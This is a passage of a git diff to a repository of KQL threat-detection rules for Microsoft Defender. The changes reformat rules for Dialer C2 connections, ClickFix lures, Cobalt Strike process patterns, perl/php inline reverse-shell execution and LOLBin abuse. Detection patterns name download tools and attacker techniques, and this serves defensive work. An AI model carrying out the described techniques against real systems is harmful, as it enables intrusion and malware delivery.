Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. -// This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys" -// MITRE Tactic: Execution -// Tags: attack.execution, attack.command-and-control, attack.t1071.001 -// False Positives: -// - In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false positives. - -DeviceNetworkEvents +// Title: Outbound Network Connection Initiated By Microsoft Dialer +// Author: CertainlyP +// Date: 2024-04-26 +// Level: high +// Description: Detects outbound network connection initiated by Microsoft Dialer. +// The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. +// This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.command-and-control, attack.t1071.001 +// False Positives: +// - In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false positives. + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dialer.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql b/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql index 4bb6b241..49ff20b1 100644 --- a/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql +++ b/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql @@ -1,10 +1,10 @@ -// Title: Outlook EnableUnsafeClientMailRules Setting Enabled -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2018-12-27 -// Level: high -// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202 - -DeviceProcessEvents +// Title: Outlook EnableUnsafeClientMailRules Setting Enabled +// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-12-27 +// Level: high +// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202 + +DeviceProcessEvents | where ProcessCommandLine contains "\\Outlook\\Security\\EnableUnsafeClientMailRules" \ No newline at end of file diff --git a/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql b/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql index 46ec6a4e..b3683b8c 100644 --- a/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql +++ b/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql @@ -1,10 +1,10 @@ -// Title: Payload Decoded and Decrypted via Built-in Utilities -// Author: Tim Rauch (rule), Elastic (idea) -// Date: 2022-10-17 -// Level: medium -// Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer. -// MITRE Tactic: Execution -// Tags: attack.t1059, attack.t1204, attack.execution, attack.t1140, attack.defense-evasion, attack.s0482, attack.s0402 - -DeviceProcessEvents +// Title: Payload Decoded and Decrypted via Built-in Utilities +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-17 +// Level: medium +// Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer. +// MITRE Tactic: Execution +// Tags: attack.t1059, attack.t1204, attack.execution, attack.t1140, attack.defense-evasion, attack.s0482, attack.s0402 + +DeviceProcessEvents | where (ProcessCommandLine contains "/Volumes/" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "-base64" and ProcessCommandLine contains " -d ") and FolderPath endswith "/openssl" \ No newline at end of file diff --git a/KQL/rules/Execution/pcre_net_package_image_load.kql b/KQL/rules/Execution/pcre_net_package_image_load.kql index 7305c0fd..27eb3c9d 100644 --- a/KQL/rules/Execution/pcre_net_package_image_load.kql +++ b/KQL/rules/Execution/pcre_net_package_image_load.kql @@ -1,10 +1,10 @@ -// Title: PCRE.NET Package Image Load -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-10-29 -// Level: high -// Description: Detects processes loading modules related to PCRE.NET package -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceImageLoadEvents +// Title: PCRE.NET Package Image Load +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-29 +// Level: high +// Description: Detects processes loading modules related to PCRE.NET package +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceImageLoadEvents | where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\" \ No newline at end of file diff --git a/KQL/rules/Execution/pcre_net_package_temp_files.kql b/KQL/rules/Execution/pcre_net_package_temp_files.kql index 8c7e4bf5..b3dc4af7 100644 --- a/KQL/rules/Execution/pcre_net_package_temp_files.kql +++ b/KQL/rules/Execution/pcre_net_package_temp_files.kql @@ -1,10 +1,10 @@ -// Title: PCRE.NET Package Temp Files -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-10-29 -// Level: high -// Description: Detects processes creating temp files related to PCRE.NET package -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceFileEvents +// Title: PCRE.NET Package Temp Files +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-29 +// Level: high +// Description: Detects processes creating temp files related to PCRE.NET package +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceFileEvents | where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\" \ No newline at end of file diff --git a/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql b/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql index fc9fcce2..c14a54d3 100644 --- a/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql +++ b/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql @@ -1,12 +1,12 @@ -// Title: PDQ Deploy Remote Adminstartion Tool Execution -// Author: frack113 -// Date: 2022-10-01 -// Level: medium -// Description: Detect use of PDQ Deploy remote admin tool -// MITRE Tactic: Execution -// Tags: attack.execution, attack.lateral-movement, attack.t1072 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: PDQ Deploy Remote Adminstartion Tool Execution +// Author: frack113 +// Date: 2022-10-01 +// Level: medium +// Description: Detect use of PDQ Deploy remote admin tool +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1072 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/perl_inline_command_execution.kql b/KQL/rules/Execution/perl_inline_command_execution.kql index 5d7cc9ad..38753a5a 100644 --- a/KQL/rules/Execution/perl_inline_command_execution.kql +++ b/KQL/rules/Execution/perl_inline_command_execution.kql @@ -1,10 +1,10 @@ -// Title: Perl Inline Command Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-02 -// Level: medium -// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Perl Inline Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: medium +// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where ProcessCommandLine contains " -e" and (FolderPath endswith "\\perl.exe" or ProcessVersionInfoOriginalFileName =~ "perl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/php_inline_command_execution.kql b/KQL/rules/Execution/php_inline_command_execution.kql index 4ed236fa..18fd54fa 100644 --- a/KQL/rules/Execution/php_inline_command_execution.kql +++ b/KQL/rules/Execution/php_inline_command_execution.kql @@ -1,10 +1,10 @@ -// Title: Php Inline Command Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-02 -// Level: medium -// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Php Inline Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: medium +// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where ProcessCommandLine contains " -r" and (FolderPath endswith "\\php.exe" or ProcessVersionInfoOriginalFileName =~ "php.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql b/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql index 0c8438aa..a225d904 100644 --- a/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql +++ b/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential Arbitrary Command Execution Via FTP.EXE -// Author: Victor Sergeev, oscd.community -// Date: 2020-10-09 -// Level: medium -// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe". -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Potential Arbitrary Command Execution Via FTP.EXE +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:" or ProcessCommandLine contains "–s:" or ProcessCommandLine contains "—s:" or ProcessCommandLine contains "―s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql index bc0b587e..250390c8 100644 --- a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql +++ b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Arbitrary File Download Via Cmdl32.EXE -// Author: frack113 -// Date: 2021-11-03 -// Level: medium -// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. -// Attackers can abuse this utility in order to download arbitrary files via a configuration file. -// Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 - -DeviceProcessEvents +// Title: Potential Arbitrary File Download Via Cmdl32.EXE +// Author: frack113 +// Date: 2021-11-03 +// Level: medium +// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. +// Attackers can abuse this utility in order to download arbitrary files via a configuration file. +// Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 + +DeviceProcessEvents | where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql index 0c0de02c..a8fb2192 100644 --- a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql +++ b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql @@ -1,12 +1,12 @@ -// Title: Potential Binary Impersonating Sysinternals Tools -// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2021-12-20 -// Level: medium -// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection. -// This rule looks for the execution of binaries that are named similarly to Sysinternals tools. -// Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, attack.t1036.005 - -DeviceProcessEvents +// Title: Potential Binary Impersonating Sysinternals Tools +// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2021-12-20 +// Level: medium +// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection. +// This rule looks for the execution of binaries that are named similarly to Sysinternals tools. +// Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, attack.t1036.005 + +DeviceProcessEvents | where ((FolderPath endswith "\\accesschk64a.exe" or FolderPath endswith "\\ADExplorer64a.exe" or FolderPath endswith "\\ADInsight64a.exe" or FolderPath endswith "\\adrestore64a.exe" or FolderPath endswith "\\Autologon64a.exe" or FolderPath endswith "\\Autoruns64a.exe" or FolderPath endswith "\\autorunsc64a.exe" or FolderPath endswith "\\Clockres64a.exe" or FolderPath endswith "\\Contig64a.exe" or FolderPath endswith "\\Coreinfo64a.exe" or FolderPath endswith "\\Dbgview64a.exe" or FolderPath endswith "\\disk2vhd64a.exe" or FolderPath endswith "\\diskext64a.exe" or FolderPath endswith "\\DiskView64a.exe" or FolderPath endswith "\\du64a.exe" or FolderPath endswith "\\FindLinks64a.exe" or FolderPath endswith "\\handle64a.exe" or FolderPath endswith "\\hex2dec64a.exe" or FolderPath endswith "\\junction64a.exe" or FolderPath endswith "\\LoadOrd64a.exe" or FolderPath endswith "\\LoadOrdC64a.exe" or FolderPath endswith "\\logonsessions64a.exe" or FolderPath endswith "\\movefile64a.exe" or FolderPath endswith "\\notmyfault64a.exe" or FolderPath endswith "\\notmyfaultc64a.exe" or FolderPath endswith "\\pendmoves64a.exe" or FolderPath endswith "\\pipelist64a.exe" or FolderPath endswith "\\procdump64a.exe" or FolderPath endswith "\\procexp64a.exe" or FolderPath endswith "\\Procmon64a.exe" or FolderPath endswith "\\PsExec64a.exe" or FolderPath endswith "\\psfile64a.exe" or FolderPath endswith "\\PsGetsid64a.exe" or FolderPath endswith "\\PsInfo64a.exe" or FolderPath endswith "\\pskill64a.exe" or FolderPath endswith "\\psloglist64a.exe" or FolderPath endswith "\\pspasswd64a.exe" or FolderPath endswith "\\psping64a.exe" or FolderPath endswith "\\PsService64a.exe" or FolderPath endswith "\\pssuspend64a.exe" or FolderPath endswith "\\RAMMap64a.exe" or FolderPath endswith "\\RegDelNull64a.exe" or FolderPath endswith "\\ru64a.exe" or FolderPath endswith "\\sdelete64a.exe" or FolderPath endswith "\\sigcheck64a.exe" or FolderPath endswith "\\streams64a.exe" or FolderPath endswith "\\strings64a.exe" or FolderPath endswith "\\sync64a.exe" or FolderPath endswith "\\Sysmon64a.exe" or FolderPath endswith "\\tcpvcon64a.exe" or FolderPath endswith "\\tcpview64a.exe" or FolderPath endswith "\\vmmap64a.exe" or FolderPath endswith "\\whois64a.exe" or FolderPath endswith "\\Winobj64a.exe" or FolderPath endswith "\\ZoomIt64a.exe") or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith "\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith "\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RAMMap64.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe")) and (not(((isnull(ProcessVersionInfoCompanyName) or isnull(ProcessVersionInfoProductName)) or ((ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals")) or ProcessVersionInfoProductName startswith "Sysinternals")))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql b/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql index 77221f2c..f1fc8453 100644 --- a/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql +++ b/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Binary Proxy Execution Via Cdb.EXE -// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-10-26 -// Level: medium -// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1106, attack.defense-evasion, attack.t1218, attack.t1127 -// False Positives: -// - Legitimate use of debugging tools - -DeviceProcessEvents +// Title: Potential Binary Proxy Execution Via Cdb.EXE +// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-26 +// Level: medium +// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1106, attack.defense-evasion, attack.t1218, attack.t1127 +// False Positives: +// - Legitimate use of debugging tools + +DeviceProcessEvents | where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql index faf42fc6..1f7552b1 100644 --- a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql +++ b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql @@ -1,15 +1,15 @@ -// Title: Potential ClickFix Execution Pattern - Registry -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-03-25 -// Level: high -// Description: Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. -// ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages. -// Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content, -// such as one-liners that execute remotely hosted malicious files or scripts. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.001 -// False Positives: -// - Legitimate applications using RunMRU with HTTP links - -DeviceRegistryEvents +// Title: Potential ClickFix Execution Pattern - Registry +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-03-25 +// Level: high +// Description: Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. +// ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages. +// Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content, +// such as one-liners that execute remotely hosted malicious files or scripts. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.001 +// False Positives: +// - Legitimate applications using RunMRU with HTTP links + +DeviceRegistryEvents | where (RegistryValueData contains "http://" or RegistryValueData contains "https://") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*" and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql b/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql index cc093543..b77923f8 100644 --- a/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql +++ b/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql @@ -1,10 +1,10 @@ -// Title: Potential CobaltStrike Process Patterns -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-07-27 -// Level: high -// Description: Detects potential process patterns related to Cobalt Strike beacon activity -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Potential CobaltStrike Process Patterns +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-07-27 +// Level: high +// Description: Detects potential process patterns related to Cobalt Strike beacon activity +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and (InitiatingProcessCommandLine contains "cmd.exe /C echo" and InitiatingProcessCommandLine contains " > \\\\.\\pipe")) or (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and InitiatingProcessCommandLine endswith "/C whoami") or (ProcessCommandLine endswith "cmd.exe /C whoami" and InitiatingProcessFolderPath startswith "C:\\Temp\\") or ((ProcessCommandLine contains "cmd.exe /c echo" and ProcessCommandLine contains "> \\\\.\\pipe") and (InitiatingProcessFolderPath endswith "\\runonce.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql b/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql index 99339f41..7f970e5e 100644 --- a/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql +++ b/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential CommandLine Path Traversal Via Cmd.EXE -// Author: xknow @xknow_infosec, Tim Shelton -// Date: 2020-06-11 -// Level: high -// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.003 -// False Positives: -// - Java tools are known to produce false-positive when loading libraries - -DeviceProcessEvents +// Title: Potential CommandLine Path Traversal Via Cmd.EXE +// Author: xknow @xknow_infosec, Tim Shelton +// Date: 2020-06-11 +// Level: high +// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking +// MITRE Tactic: Execution +// 